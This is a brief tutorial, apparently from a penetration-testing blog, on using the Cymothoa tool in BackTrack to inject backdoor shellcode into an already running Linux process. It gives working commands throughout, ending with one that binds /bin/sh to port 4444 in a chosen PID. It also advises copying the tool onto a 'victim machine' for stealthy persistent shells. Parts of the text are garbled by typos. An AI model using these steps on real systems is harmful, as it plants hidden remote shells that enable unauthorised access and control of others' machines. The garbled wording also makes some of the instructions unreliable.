Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them. But keep in mind it’s a runtime injector so it only works on applications that are already running.
Open your backtrack terminal and type cd /pentest/backdoors/cymothoa
Not type. /cymothoa
The main syntax is: ./cymothoa –p <pid> -s <shellcode_number> [options]
Now type. /cymothoa –S for list of all available shellcodes
To try to infect a currently running process I run to see a list of life processes type ps –aux
I try to launch a version of dictionary to attach on to. /cymothoa –p 1510 –s 0 –y 4444
|-p||process ID 1510|
|-s||shell code number 0 bind /bin/sh to the provided port (requires -y)|
|-4444||that will open up a shell on port 4444|
You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.
Now scan pc with nmap: nmap –sV 192.168.1.3 (Victim IP)